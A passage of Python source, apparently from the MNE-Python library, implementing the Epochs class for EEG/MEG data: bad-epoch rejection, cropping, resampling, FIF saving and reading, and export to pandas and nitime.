activate = False if self._check_delayed() else self.proj
self._projector, self.info = setup_proj(self.info, add_eeg_ref,
activate=activate)
for key, val in self.event_id.items():
if val not in events[:, 2]:
msg = ('No matching events found for %s '
'(event id %i)' % (key, val))
if on_missing == 'error':
raise ValueError(msg)
elif on_missing == 'warning':
logger.warn(msg)
warnings.warn(msg)
else: # on_missing == 'ignore':
pass
# Select the desired events
values = list(self.event_id.values())
selected = in1d(events[:, 2], values)
self.events = events[selected]
n_events = len(self.events)
if n_events > 1:
if np.diff(self.events.astype(np.int64)[:, 0]).min() <= 0:
warnings.warn('The events passed to the Epochs constructor '
'are not chronologically ordered.',
RuntimeWarning)
if n_events > 0:
logger.info('%d matching events found' % n_events)
else:
raise ValueError('No desired events found.')
self.selection = np.where(selected)[0]
self.drop_log = []
for k in range(len(events)):
if events[k, 2] in values:
self.drop_log.append([])
else:
self.drop_log.append(['IGNORED'])
self.preload = preload
if self.preload:
self._data = self._get_data_from_disk()
self.raw = None
else:
self._data = None
@deprecated('drop_picks will be removed in v0.9. Use drop_channels.')
def drop_picks(self, bad_picks):
"""Drop some picks
Allows to discard some channels.
"""
self.picks = list(self.picks)
idx = [k for k, p in enumerate(self.picks) if p not in bad_picks]
self.picks = [self.picks[k] for k in idx]
self.info = pick_info(self.info, idx, copy=False)
if self._projector is not None:
self._projector = self._projector[idx][:, idx]
if self.preload:
self._data = self._data[:, idx, :]
def drop_bad_epochs(self):
"""Drop bad epochs without retaining the epochs data.
Should be used before slicing operations.
.. Warning:: Operation is slow since all epochs have to be read from
disk. To avoid reading epochs form disk multiple times, initialize
Epochs object with preload=True.
"""
self._get_data_from_disk(out=False)
def plot_drop_log(self, threshold=0, n_max_plot=20, subject='Unknown',
color=(0.9, 0.9, 0.9), width=0.8, ignore=['IGNORED']):
"""Show the channel stats based on a drop_log from Epochs
Parameters
----------
threshold : float
The percentage threshold to use to decide whether or not to
plot. Default is zero (always plot).
n_max_plot : int
Maximum number of channels to show stats for.
subject : str
The subject name to use in the title of the plot.
color : tuple | str
Color to use for the bars.
width : float
Width of the bars.
ignore : list
The drop reasons to ignore.
Returns
-------
perc : float
Total percentage of epochs dropped.
"""
if not self._bad_dropped:
print("Bad epochs have not yet been dropped.")
return
from .viz import plot_drop_log
return plot_drop_log(self.drop_log, threshold, n_max_plot, subject,
color=color, width=width, ignore=ignore)
def _check_delayed(self):
""" Aux method
"""
is_delayed = False
if self.proj == 'delayed':
if self.reject is None:
raise RuntimeError('The delayed SSP mode was requested '
'but no rejection parameters are present. '
'Please add rejection parameters before '
'using this option.')
is_delayed = True
return is_delayed
@verbose
def drop_epochs(self, indices, reason='USER', verbose=None):
"""Drop epochs based on indices or boolean mask
Note that the indices refer to the current set of undropped epochs
rather than the complete set of dropped and undropped epochs.
They are therefore not necessarily consistent with any external indices
(e.g., behavioral logs). To drop epochs based on external criteria,
do not use the preload=True flag when constructing an Epochs object,
and call this method before calling the drop_bad_epochs method.
Parameters
----------
indices : array of ints or bools
Set epochs to remove by specifying indices to remove or a boolean
mask to apply (where True values get removed). Events are
correspondingly modified.
reason : str
Reason for dropping the epochs ('ECG', 'timeout', 'blink' etc).
Default: 'USER'.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to raw.verbose.
"""
indices = np.atleast_1d(indices)
if indices.ndim > 1:
raise ValueError("indices must be a scalar or a 1-d array")
if indices.dtype == bool:
indices = np.where(indices)[0]
out_of_bounds = (indices < 0) | (indices >= len(self.events))
if out_of_bounds.any():
first = indices[out_of_bounds][0]
raise IndexError("Epoch index %d is out of bounds" % first)
for ii in indices:
self.drop_log[self.selection[ii]].append(reason)
self.selection = np.delete(self.selection, indices)
self.events = np.delete(self.events, indices, axis=0)
if self.preload:
self._data = np.delete(self._data, indices, axis=0)
count = len(indices)
logger.info('Dropped %d epoch%s' % (count, '' if count == 1 else 's'))
@verbose
def _get_epoch_from_disk(self, idx, proj, verbose=None):
"""Load one epoch from disk"""
if self.raw is None:
# This should never happen, as raw=None only if preload=True
raise ValueError('An error has occurred, no valid raw file found.'
' Please report this to the mne-python '
'developers.')
sfreq = self.raw.info['sfreq']
if self.events.ndim == 1:
# single event
event_samp = self.events[0]
else:
event_samp = self.events[idx, 0]
# Read a data segment
first_samp = self.raw.first_samp
start = int(round(event_samp + self.tmin * sfreq)) - first_samp
stop = start + self._epoch_stop
if start < 0:
return None, None
epoch_raw, _ = self.raw[self.picks, start:stop]
# setup list of epochs to handle delayed SSP
epochs = []
# whenever requested, the first epoch is being projected.
if self._projector is not None and proj is True:
epochs += [np.dot(self._projector, epoch_raw)]
else:
epochs += [epoch_raw]
# in case the proj passed is True but self proj is not we
# have delayed SSP
if self.proj != proj: # so append another unprojected epoch
epochs += [epoch_raw.copy()]
# only preprocess first candidate, to make delayed SSP working
# we need to postpone the preprocessing since projection comes
# first.
epochs[0] = self._preprocess(epochs[0], verbose)
# return a second None if nothing is projected
if len(epochs) == 1:
epochs += [None]
return epochs
@verbose
def _preprocess(self, epoch, verbose=None):
""" Aux Function
"""
if self.detrend is not None:
picks = pick_types(self.info, meg=True, eeg=True, stim=False,
ref_meg=False, eog=False, ecg=False,
emg=False, exclude=[])
epoch[picks] = detrend(epoch[picks], self.detrend, axis=1)
# Baseline correct
epoch = rescale(epoch, self._raw_times, self.baseline, 'mean',
copy=False, verbose=verbose)
# handle offset
if self._offset is not None:
epoch += self._offset
# Decimate
if self.decim > 1:
epoch = epoch[:, self._decim_idx]
return epoch
@verbose
def _get_data_from_disk(self, out=True, verbose=None):
"""Load all data from disk
Parameters
----------
out : bool
Return the data. Setting this to False is used to reject bad
epochs without caching all the data, which saves memory.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
"""
n_events = len(self.events)
data = np.array([])
if self._bad_dropped:
proj = False if self._check_delayed() else self.proj
if not out:
return
for ii in range(n_events):
# faster to pre-allocate memory here
epoch, epoch_raw = self._get_epoch_from_disk(ii, proj=proj)
if ii == 0:
data = np.empty((n_events, epoch.shape[0],
epoch.shape[1]), dtype=epoch.dtype)
if self._check_delayed():
epoch = epoch_raw
data[ii] = epoch
else:
proj = True if self._check_delayed() else self.proj
good_events = []
n_out = 0
for idx, sel in zip(range(n_events), self.selection):
epoch, epoch_raw = self._get_epoch_from_disk(idx, proj=proj)
is_good, offenders = self._is_good_epoch(epoch)
if is_good:
good_events.append(idx)
if self._check_delayed():
epoch = epoch_raw
if out:
# faster to pre-allocate, then trim as necessary
if n_out == 0:
data = np.empty((n_events, epoch.shape[0],
epoch.shape[1]),
dtype=epoch.dtype, order='C')
data[n_out] = epoch
n_out += 1
else:
self.drop_log[sel] += offenders
self.selection = self.selection[good_events]
self.events = np.atleast_2d(self.events[good_events])
self._bad_dropped = True
logger.info("%d bad epochs dropped"
% (n_events - len(good_events)))
if not out:
return
# just take the good events
assert len(good_events) == n_out
if n_out > 0:
# slicing won't free the space, so we resize
# we have ensured the C-contiguity of the array in allocation
# so this operation will be safe unless np is very broken
data.resize((n_out,) + data.shape[1:], refcheck=False)
return data
@verbose
def _is_good_epoch(self, data, verbose=None):
"""Determine if epoch is good"""
if data is None:
return False, ['NO_DATA']
n_times = len(self.times)
if data.shape[1] < n_times:
# epoch is too short ie at the end of the data
return False, ['TOO_SHORT']
if self.reject is None and self.flat is None:
return True, None
else:
if self._reject_time is not None:
data = data[:, self._reject_time]
return _is_good(data, self.ch_names, self._channel_type_idx,
self.reject, self.flat, full_report=True,
ignore_chs=self.info['bads'])
def get_data(self):
"""Get all epochs as a 3D array
Returns
-------
data : array of shape [n_epochs, n_channels, n_times]
The epochs data
"""
if self.preload:
data_ = self._data
else:
data_ = self._get_data_from_disk()
if self._check_delayed():
data = np.zeros_like(data_)
for ii, e in enumerate(data_):
data[ii] = self._preprocess(e.copy(), self.verbose)
else:
data = data_
return data
def _reject_setup(self):
"""Sets self._reject_time and self._channel_type_idx (called from
__init__)
"""
if self.reject is None and self.flat is None:
return
idx = channel_indices_by_type(self.info)
for key in idx.keys():
if (self.reject is not None and key in self.reject) \
or (self.flat is not None and key in self.flat):
if len(idx[key]) == 0:
raise ValueError("No %s channel found. Cannot reject based"
" on %s." % (key.upper(), key.upper()))
self._channel_type_idx = idx
if (self.reject_tmin is None) and (self.reject_tmax is None):
self._reject_time = None
else:
if self.reject_tmin is None:
reject_imin = None
else:
idxs = np.nonzero(self.times >= self.reject_tmin)[0]
reject_imin = idxs[0]
if self.reject_tmax is None:
reject_imax = None
else:
idxs = np.nonzero(self.times <= self.reject_tmax)[0]
reject_imax = idxs[-1]
self._reject_time = slice(reject_imin, reject_imax)
def __len__(self):
"""Number of epochs.
"""
if not self._bad_dropped:
err = ("Since bad epochs have not been dropped, the length of the "
"Epochs is not known. Load the Epochs with preload=True, "
"or call Epochs.drop_bad_epochs(). To find the number of "
"events in the Epochs, use len(Epochs.events).")
raise RuntimeError(err)
return len(self.events)
def __iter__(self):
"""To make iteration over epochs easy.
"""
self._current = 0
return self
def next(self, return_event_id=False):
"""To make iteration over epochs easy.
"""
if self.preload:
if self._current >= len(self._data):
raise StopIteration
epoch = self._data[self._current]
if self._check_delayed():
epoch = self._preprocess(epoch.copy())
self._current += 1
else:
proj = True if self._check_delayed() else self.proj
is_good = False
while not is_good:
if self._current >= len(self.events):
raise StopIteration
epoch, epoch_raw = self._get_epoch_from_disk(self._current,
proj=proj)
self._current += 1
is_good, _ = self._is_good_epoch(epoch)
# If delayed-ssp mode, pass 'virgin' data after rejection decision.
if self._check_delayed():
epoch = self._preprocess(epoch_raw)
if not return_event_id:
return epoch
else:
return epoch, self.events[self._current - 1][-1]
return epoch if not return_event_id else epoch, self.event_id
def __repr__(self):
""" Build string representation
"""
if not self._bad_dropped:
s = 'n_events : %s (good & bad)' % len(self.events)
else:
s = 'n_events : %s (all good)' % len(self.events)
s += ', tmin : %s (s)' % self.tmin
s += ', tmax : %s (s)' % self.tmax
s += ', baseline : %s' % str(self.baseline)
if len(self.event_id) > 1:
counts = ['%r: %i' % (k, sum(self.events[:, 2] == v))
for k, v in sorted(self.event_id.items())]
s += ',\n %s' % ', '.join(counts)
return '<Epochs | %s>' % s
def _key_match(self, key):
"""Helper function for event dict use"""
if key not in self.event_id:
raise KeyError('Event "%s" is not in Epochs.' % key)
return self.events[:, 2] == self.event_id[key]
def __getitem__(self, key):
"""Return an Epochs object with a subset of epochs
"""
data = self._data
del self._data
epochs = self.copy()
self._data, epochs._data = data, data
if isinstance(key, string_types):
key = [key]
if isinstance(key, list) and isinstance(key[0], string_types):
select = np.any(np.atleast_2d([epochs._key_match(k)
for k in key]), axis=0)
epochs.name = ('+'.join(key) if epochs.name == 'Unknown'
else 'epochs_%s' % '+'.join(key))
else:
select = key if isinstance(key, slice) else np.atleast_1d(key)
key_selection = epochs.selection[select]
for k in np.setdiff1d(epochs.selection, key_selection):
epochs.drop_log[k] = ['IGNORED']
epochs.selection = key_selection
epochs.events = np.atleast_2d(epochs.events[select])
if epochs.preload:
epochs._data = epochs._data[select]
# update event id to reflect new content of epochs
epochs.event_id = dict((k, v) for k, v in epochs.event_id.items()
if v in epochs.events[:, 2])
return epochs
def crop(self, tmin=None, tmax=None, copy=False):
"""Crops a time interval from epochs object.
Parameters
----------
tmin : float
Start time of selection in seconds.
tmax : float
End time of selection in seconds.
copy : bool
If False epochs is cropped in place.
Returns
-------
epochs : Epochs instance
The cropped epochs.
Note
----
Unlike Python slices, MNE time intervals include both their end points;
crop(tmin, tmax) returns the interval tmin <= t <= tmax.
"""
if not self.preload:
raise RuntimeError('Modifying data of epochs is only supported '
'when preloading is used. Use preload=True '
'in the constructor.')
if tmin is None:
tmin = self.tmin
elif tmin < self.tmin:
warnings.warn("tmin is not in epochs' time interval."
"tmin is set to epochs.tmin")
tmin = self.tmin
if tmax is None:
tmax = self.tmax
elif tmax > self.tmax:
warnings.warn("tmax is not in epochs' time interval."
"tmax is set to epochs.tmax")
tmax = self.tmax
tmask = (self.times >= tmin) & (self.times <= tmax)
tidx = np.where(tmask)[0]
this_epochs = self if not copy else self.copy()
this_epochs.tmin = this_epochs.times[tidx[0]]
this_epochs.tmax = this_epochs.times[tidx[-1]]
this_epochs.times = this_epochs.times[tmask]
this_epochs._data = this_epochs._data[:, :, tmask]
return this_epochs
@verbose
def resample(self, sfreq, npad=100, window='boxcar', n_jobs=1,
verbose=None):
"""Resample preloaded data
Parameters
----------
sfreq : float
New sample rate to use
npad : int
Amount to pad the start and end of the data.
window : string or tuple
Window to use in resampling. See scipy.signal.resample.
n_jobs : int
Number of jobs to run in parallel.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
Notes
-----
For some data, it may be more accurate to use npad=0 to reduce
artifacts. This is dataset dependent -- check your data!
"""
if self.preload:
o_sfreq = self.info['sfreq']
self._data = resample(self._data, sfreq, o_sfreq, npad,
n_jobs=n_jobs)
# adjust indirectly affected variables
self.info['sfreq'] = sfreq
self.times = (np.arange(self._data.shape[2], dtype=np.float)
/ sfreq + self.times[0])
else:
raise RuntimeError('Can only resample preloaded data')
def copy(self):
"""Return copy of Epochs instance"""
raw = self.raw
del self.raw
new = cp.deepcopy(self)
self.raw = raw
new.raw = raw
return new
def save(self, fname):
"""Save epochs in a fif file
Parameters
----------
fname : str
The name of the file.
"""
# Create the file and save the essentials
fid = start_file(fname)
start_block(fid, FIFF.FIFFB_MEAS)
write_id(fid, FIFF.FIFF_BLOCK_ID)
if self.info['meas_id'] is not None:
write_id(fid, FIFF.FIFF_PARENT_BLOCK_ID, self.info['meas_id'])
# Write measurement info
write_meas_info(fid, self.info)
# One or more evoked data sets
start_block(fid, FIFF.FIFFB_PROCESSED_DATA)
start_block(fid, FIFF.FIFFB_EPOCHS)
# write events out after getting data to ensure bad events are dropped
data = self.get_data()
start_block(fid, FIFF.FIFFB_MNE_EVENTS)
write_int(fid, FIFF.FIFF_MNE_EVENT_LIST, self.events.T)
mapping_ = ';'.join([k + ':' + str(v) for k, v in
self.event_id.items()])
write_string(fid, FIFF.FIFF_DESCRIPTION, mapping_)
end_block(fid, FIFF.FIFFB_MNE_EVENTS)
# First and last sample
first = int(self.times[0] * self.info['sfreq'])
last = first + len(self.times) - 1
write_int(fid, FIFF.FIFF_FIRST_SAMPLE, first)
write_int(fid, FIFF.FIFF_LAST_SAMPLE, last)
# save baseline
if self.baseline is not None:
bmin, bmax = self.baseline
bmin = self.times[0] if bmin is None else bmin
bmax = self.times[-1] if bmax is None else bmax
write_float(fid, FIFF.FIFF_MNE_BASELINE_MIN, bmin)
write_float(fid, FIFF.FIFF_MNE_BASELINE_MAX, bmax)
# The epochs itself
decal = np.empty(self.info['nchan'])
for k in range(self.info['nchan']):
decal[k] = 1.0 / (self.info['chs'][k]['cal']
* self.info['chs'][k].get('scale', 1.0))
data *= decal[np.newaxis, :, np.newaxis]
write_float_matrix(fid, FIFF.FIFF_EPOCH, data)
# undo modifications to data
data /= decal[np.newaxis, :, np.newaxis]
write_string(fid, FIFF.FIFFB_MNE_EPOCHS_DROP_LOG,
json.dumps(self.drop_log))
write_int(fid, FIFF.FIFFB_MNE_EPOCHS_SELECTION,
self.selection)
end_block(fid, FIFF.FIFFB_EPOCHS)
end_block(fid, FIFF.FIFFB_PROCESSED_DATA)
end_block(fid, FIFF.FIFFB_MEAS)
end_file(fid)
def as_data_frame(self, picks=None, index=None, scale_time=1e3,
scalings=None, copy=True):
"""Get the epochs as Pandas DataFrame
Export epochs data in tabular structure with MEG channels as columns
and three additional info columns 'epoch', 'condition', and 'time'.
The format matches a long table format commonly used to represent
repeated measures in within-subject designs.
Parameters
----------
picks : None | array of int
If None only MEG and EEG channels are kept
otherwise the channels indices in picks are kept.
index : tuple of str | None
Column to be used as index for the data. Valid string options
are 'epoch', 'time' and 'condition'. If None, all three info
columns will be included in the table as categorial data.
scale_time : float
Scaling to be applied to time units.
scalings : dict | None
Scaling to be applied to the channels picked. If None, defaults to
``scalings=dict(eeg=1e6, grad=1e13, mag=1e15, misc=1.0)`.
copy : bool
If true, data will be copied. Else data may be modified in place.
Returns
-------
df : instance of pandas.core.DataFrame
Epochs exported into tabular data structure.
"""
pd = _check_pandas_installed()
default_index = ['condition', 'epoch', 'time']
if index is not None:
_check_pandas_index_arguments(index, default_index)
else:
index = default_index
if picks is None:
picks = list(range(self.info['nchan']))
else:
if not in1d(picks, np.arange(len(self.events))).all():
raise ValueError('At least one picked channel is not present '
'in this eppochs instance.')
data = self.get_data()[:, picks, :]
shape = data.shape
data = np.hstack(data).T
if copy:
data = data.copy()
types = [channel_type(self.info, idx) for idx in picks]
n_channel_types = 0
ch_types_used = []
scalings = _mutable_defaults(('scalings', scalings))[0]
for t in scalings.keys():
if t in types:
n_channel_types += 1
ch_types_used.append(t)
for t in ch_types_used:
scaling = scalings[t]
idx = [picks[i] for i in range(len(picks)) if types[i] == t]
if len(idx) > 0:
data[:, idx] *= scaling
id_swapped = dict((v, k) for k, v in self.event_id.items())
names = [id_swapped[k] for k in self.events[:, 2]]
mindex = list()
mindex.append(('condition', np.repeat(names, shape[2])))
mindex.append(('time', np.tile(self.times, shape[0]) *
scale_time)) # if 'epoch' in index:
mindex.append(('epoch', np.repeat(np.arange(shape[0]),
shape[2])))
assert all(len(mdx) == len(mindex[0]) for mdx in mindex)
col_names = [self.ch_names[k] for k in picks]
df = pd.DataFrame(data, columns=col_names)
[df.insert(i, k, v) for i, (k, v) in enumerate(mindex)]
if index is not None:
with warnings.catch_warnings(record=True):
if 'time' in index:
df['time'] = df['time'].astype(np.int64)
df.set_index(index, inplace=True)
return df
def to_nitime(self, picks=None, epochs_idx=None, collapse=False,
copy=True, first_samp=0):
""" Export epochs as nitime TimeSeries
Parameters
----------
picks : array-like | None
Indices for exporting subsets of the epochs channels. If None
all good channels will be used.
epochs_idx : slice | array-like | None
Epochs index for single or selective epochs exports. If None, all
epochs will be used.
collapse : boolean
If True export epochs and time slices will be collapsed to 2D
array. This may be required by some nitime functions.
copy : boolean
If True exports copy of epochs data.
first_samp : int
Number of samples to offset the times by. Use raw.first_samp to
have the time returned relative to the session onset, or zero
(default) for time relative to the recording onset.
Returns
-------
epochs_ts : instance of nitime.TimeSeries
The Epochs as nitime TimeSeries object.
"""
try:
from nitime import TimeSeries # to avoid strong dependency
except ImportError:
raise Exception('the nitime package is missing')
if picks is None:
picks = pick_types(self.info, include=self.ch_names,
exclude='bads')
if epochs_idx is None:
epochs_idx = slice(len(self.events))
data = self.get_data()[epochs_idx, picks]
if copy is True:
data = data.copy()
if collapse is True:
data = np.hstack(data).copy()
offset = _time_as_index(abs(self.tmin), self.info['sfreq'],
first_samp, True)
t0 = _index_as_time(self.events[0, 0] - offset, self.info['sfreq'],
first_samp, True)[0]
epochs_ts = TimeSeries(data, sampling_rate=self.info['sfreq'], t0=t0)
epochs_ts.ch_names = np.array(self.ch_names)[picks].tolist()
return epochs_ts
def equalize_event_counts(self, event_ids, method='mintime', copy=True):
"""Equalize the number of trials in each condition
It tries to make the remaining epochs occurring as close as possible in
time. This method works based on the idea that if there happened to be
some time-varying (like on the scale of minutes) noise characteristics
during a recording, they could be compensated for (to some extent) in
the equalization process. This method thus seeks to reduce any of
those effects by minimizing the differences in the times of the events
in the two sets of epochs. For example, if one had event times
[1, 2, 3, 4, 120, 121] and the other one had [3.5, 4.5, 120.5, 121.5],
it would remove events at times [1, 2] in the first epochs and not
[20, 21].
Parameters
----------
event_ids : list
The event types to equalize. Each entry in the list can either be
a str (single event) or a list of str. In the case where one of
the entries is a list of str, event_ids in that list will be
grouped together before equalizing trial counts across conditions.
method : str
If 'truncate', events will be truncated from the end of each event
list. If 'mintime', timing differences between each event list will
be minimized.
copy : bool
If True, a copy of epochs will be returned. Otherwise, the
function will operate in-place.
Returns
-------
epochs : instance of Epochs
The modified Epochs instance.
indices : array of int
Indices from the original events list that were dropped.
Notes
----
For example (if epochs.event_id was {'Left': 1, 'Right': 2,
'Nonspatial':3}:
epochs.equalize_event_counts([['Left', 'Right'], 'Nonspatial'])
would equalize the number of trials in the 'Nonspatial' condition with
the total number of trials in the 'Left' and 'Right' conditions.
"""
if copy is True:
epochs = self.copy()
else:
epochs = self
if len(event_ids) == 0:
raise ValueError('event_ids must have at least one element')
if not epochs._bad_dropped:
epochs.drop_bad_epochs()
# figure out how to equalize
eq_inds = list()
for eq in event_ids:
eq = np.atleast_1d(eq)
# eq is now a list of types
key_match = np.zeros(epochs.events.shape[0])
for key in eq:
key_match = np.logical_or(key_match, epochs._key_match(key))
eq_inds.append(np.where(key_match)[0])
event_times = [epochs.events[eq, 0] for eq in eq_inds]
indices = _get_drop_indices(event_times, method)
# need to re-index indices
indices = np.concatenate([eq[inds]
for eq, inds in zip(eq_inds, indices)])
epochs.drop_epochs(indices, reason='EQUALIZED_COUNT')
# actually remove the indices
return epochs, indices
def combine_event_ids(epochs, old_event_ids, new_event_id, copy=True):
"""Collapse event_ids from an epochs instance into a new event_id
Parameters
----------
epochs : instance of Epochs
The epochs to operate on.
old_event_ids : str, or list
Conditions to collapse together.
new_event_id : dict, or int
A one-element dict (or a single integer) for the new
condition. Note that for safety, this cannot be any
existing id (in epochs.event_id.values()).
copy : bool
If True, a copy of epochs will be returned. Otherwise, the
function will operate in-place.
Notes
-----
This For example (if epochs.event_id was {'Left': 1, 'Right': 2}:
combine_event_ids(epochs, ['Left', 'Right'], {'Directional': 12})
would create a 'Directional' entry in epochs.event_id replacing
'Left' and 'Right' (combining their trials).
"""
if copy:
epochs = epochs.copy()
old_event_ids = np.asanyarray(old_event_ids)
if isinstance(new_event_id, int):
new_event_id = {str(new_event_id): new_event_id}
else:
if not isinstance(new_event_id, dict):
raise ValueError('new_event_id must be a dict or int')
if not len(list(new_event_id.keys())) == 1:
raise ValueError('new_event_id dict must have one entry')
new_event_num = list(new_event_id.values())[0]
if not isinstance(new_event_num, int):
raise ValueError('new_event_id value must be an integer')
if new_event_num in epochs.event_id.values():
raise ValueError('new_event_id value must not already exist')
# could use .pop() here, but if a latter one doesn't exist, we're
# in trouble, so run them all here and pop() later
old_event_nums = np.array([epochs.event_id[key] for key in old_event_ids])
# find the ones to replace
inds = np.any(epochs.events[:, 2][:, np.newaxis] ==
old_event_nums[np.newaxis, :], axis=1)
# replace the event numbers in the events list
epochs.events[inds, 2] = new_event_num
# delete old entries
[epochs.event_id.pop(key) for key in old_event_ids]
# add the new entry
epochs.event_id.update(new_event_id)
return epochs
def equalize_epoch_counts(epochs_list, method='mintime'):
"""Equalize the number of trials in multiple Epoch instances
It tries to make the remaining epochs occurring as close as possible in
time. This method works based on the idea that if there happened to be some
time-varying (like on the scale of minutes) noise characteristics during
a recording, they could be compensated for (to some extent) in the
equalization process. This method thus seeks to reduce any of those effects
by minimizing the differences in the times of the events in the two sets of
epochs. For example, if one had event times [1, 2, 3, 4, 120, 121] and the
other one had [3.5, 4.5, 120.5, 121.5], it would remove events at times
[1, 2] in the first epochs and not [20, 21].
Note that this operates on the Epochs instances in-place.
Example:
equalize_epoch_counts(epochs1, epochs2)
Parameters
----------
epochs_list : list of Epochs instances
The Epochs instances to equalize trial counts for.
method : str
If 'truncate', events will be truncated from the end of each event
list. If 'mintime', timing differences between each event list will be
minimized.
"""
if not all([isinstance(e, Epochs) for e in epochs_list]):
raise ValueError('All inputs must be Epochs instances')
# make sure bad epochs are dropped
[e.drop_bad_epochs() if not e._bad_dropped else None for e in epochs_list]
event_times = [e.events[:, 0] for e in epochs_list]
indices = _get_drop_indices(event_times, method)
for e, inds in zip(epochs_list, indices):
e.drop_epochs(inds, reason='EQUALIZED_COUNT')
def _get_drop_indices(event_times, method):
"""Helper to get indices to drop from multiple event timing lists"""
small_idx = np.argmin([e.shape[0] for e in event_times])
small_e_times = event_times[small_idx]
if not method in ['mintime', 'truncate']:
raise ValueError('method must be either mintime or truncate, not '
'%s' % method)
indices = list()
for e in event_times:
if method == 'mintime':
mask = _minimize_time_diff(small_e_times, e)
else:
mask = np.ones(e.shape[0], dtype=bool)
mask[small_e_times.shape[0]:] = False
indices.append(np.where(np.logical_not(mask))[0])
return indices
def _minimize_time_diff(t_shorter, t_longer):
"""Find a boolean mask to minimize timing differences"""
keep = np.ones((len(t_longer)), dtype=bool)
scores = np.ones((len(t_longer)))
for iter in range(len(t_longer) - len(t_shorter)):
scores.fill(np.inf)
# Check every possible removal to see if it minimizes
for idx in np.where(keep)[0]:
keep[idx] = False
scores[idx] = _area_between_times(t_shorter, t_longer[keep])
keep[idx] = True
keep[np.argmin(scores)] = False
return keep
def _area_between_times(t1, t2):
"""Quantify the difference between two timing sets"""
x1 = list(range(len(t1)))
x2 = list(range(len(t2)))
xs = np.concatenate((x1, x2))
return np.sum(np.abs(np.interp(xs, x1, t1) - np.interp(xs, x2, t2)))
@verbose
def _is_good(e, ch_names, channel_type_idx, reject, flat, full_report=False,
ignore_chs=[], verbose=None):
"""Test if data segment e is good according to the criteria
defined in reject and flat. If full_report=True, it will give
True/False as well as a list of all offending channels.
"""
bad_list = list()
has_printed = False
checkable = np.ones(len(ch_names), dtype=bool)
checkable[np.array([c in ignore_chs
for c in ch_names], dtype=bool)] = False
for refl, f, t in zip([reject, flat], [np.greater, np.less], ['', 'flat']):
if refl is not None:
for key, thresh in six.iteritems(refl):
idx = channel_type_idx[key]
name = key.upper()
if len(idx) > 0:
e_idx = e[idx]
deltas = np.max(e_idx, axis=1) - np.min(e_idx, axis=1)
checkable_idx = checkable[idx]
idx_deltas = np.where(np.logical_and(f(deltas, thresh),
checkable_idx))[0]
if len(idx_deltas) > 0:
ch_name = [ch_names[idx[i]] for i in idx_deltas]
if (not has_printed):
logger.info(' Rejecting %s epoch based on %s : '
'%s' % (t, name, ch_name))
has_printed = True
if not full_report:
return False
else:
bad_list.extend(ch_name)
if not full_report:
return True
else:
if bad_list == []:
return True, None
else:
return False, bad_list
@verbose
def read_epochs(fname, proj=True, add_eeg_ref=True, verbose=None):
"""Read epochs from a fif file
Parameters
----------
fname : str
The name of the file.
proj : bool | 'delayed'
Apply SSP projection vectors. If proj is 'delayed' and reject is not
None the single epochs will be projected before the rejection
decision, but used in unprojected state if they are kept.
This way deciding which projection vectors are good can be postponed
to the evoked stage without resulting in lower epoch counts and
without producing results different from early SSP application
given comparable parameters. Note that in this case baselining,
detrending and temporal decimation will be postponed.
If proj is False no projections will be applied which is the
recommended value if SSPs are not used for cleaning the data.
add_eeg_ref : bool
If True, an EEG average reference will be added (unless one
already exists).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to raw.verbose.
Returns
-------
epochs : instance of Epochs
The epochs
"""
epochs = Epochs(None, None, None, None, None)
logger.info('Reading %s ...' % fname)
fid, tree, _ = fiff_open(fname)
# Read the measurement info
info, meas = read_meas_info(fid, tree)
info['filename'] = fname
events, mappings = _read_events_fif(fid, tree)
# Locate the data of interest
processed = dir_tree_find(meas, FIFF.FIFFB_PROCESSED_DATA)
if len(processed) == 0:
fid.close()
raise ValueError('Could not find processed data')
epochs_node = dir_tree_find(tree, FIFF.FIFFB_EPOCHS)
if len(epochs_node) == 0:
fid.close()
raise ValueError('Could not find epochs data')
my_epochs = epochs_node[0]
# Now find the data in the block
comment = None
data = None
bmin, bmax = None, None
baseline = None
selection = None
drop_log = []
for k in range(my_epochs['nent']):
kind = my_epochs['directory'][k].kind
pos = my_epochs['directory'][k].pos
if kind == FIFF.FIFF_FIRST_SAMPLE:
tag = read_tag(fid, pos)
first = int(tag.data)
elif kind == FIFF.FIFF_LAST_SAMPLE:
tag = read_tag(fid, pos)
last = int(tag.data)
elif kind == FIFF.FIFF_COMMENT:
tag = read_tag(fid, pos)
comment = tag.data
elif kind == FIFF.FIFF_EPOCH:
tag = read_tag(fid, pos)
data = tag.data.astype(np.float)
elif kind == FIFF.FIFF_MNE_BASELINE_MIN:
tag = read_tag(fid, pos)
bmin = float(tag.data)
elif kind == FIFF.FIFF_MNE_BASELINE_MAX:
tag = read_tag(fid, pos)
bmax = float(tag.data)
elif kind == FIFF.FIFFB_MNE_EPOCHS_SELECTION:
tag = read_tag(fid, pos)
selection = np.array(tag.data)
elif kind == FIFF.FIFFB_MNE_EPOCHS_DROP_LOG:
tag = read_tag(fid, pos)
drop_log = json.loads(tag.data)
if bmin is not None or bmax is not None:
baseline = (bmin, bmax)
nsamp = last - first + 1
logger.info(' Found the data of interest:')
logger.info(' t = %10.2f ... %10.2f ms (%s)'
% (1000 * first / info['sfreq'],
1000 * last / info['sfreq'], comment))
if info['comps'] is not None:
logger.info(' %d CTF compensation matrices available'
% len(info['comps']))
# Read the data
if data is None:
raise ValueError('Epochs data not found')
if data.shape[2] != nsamp:
fid.close()
raise ValueError('Incorrect number of samples (%d instead of %d)'
% (data.shape[2], nsamp))
# Calibrate
cals = np.array([info['chs'][k]['cal'] * info['chs'][k].get('scale', 1.0)
for k in range(info['nchan'])])
data *= cals[np.newaxis, :, np.newaxis]
times = np.arange(first, last + 1, dtype=np.float) / info['sfreq']
tmin = times[0]
tmax = times[-1]
# Put it all together
epochs.preload = True
epochs.raw = None
epochs.picks = np.arange(data.shape[1])
epochs._bad_dropped = True
epochs.events = events
epochs._data = data
epochs.info = info
epochs.tmin = tmin
epochs.tmax = tmax
epochs.name = comment
epochs.times = times
epochs._data = data
epochs.proj = proj
activate = False if epochs._check_delayed() else proj
epochs._projector, epochs.info = setup_proj(info, add_eeg_ref,
activate=activate)
epochs.baseline = baseline
epochs.event_id = (dict((str(e), e) for e in np.unique(events[:, 2]))
if mappings is None else mappings)
epochs.verbose = verbose
# In case epochs didn't have a FIFF.FIFFB_MNE_EPOCHS_SELECTION tag
# (version < 0.8):
if selection is None:
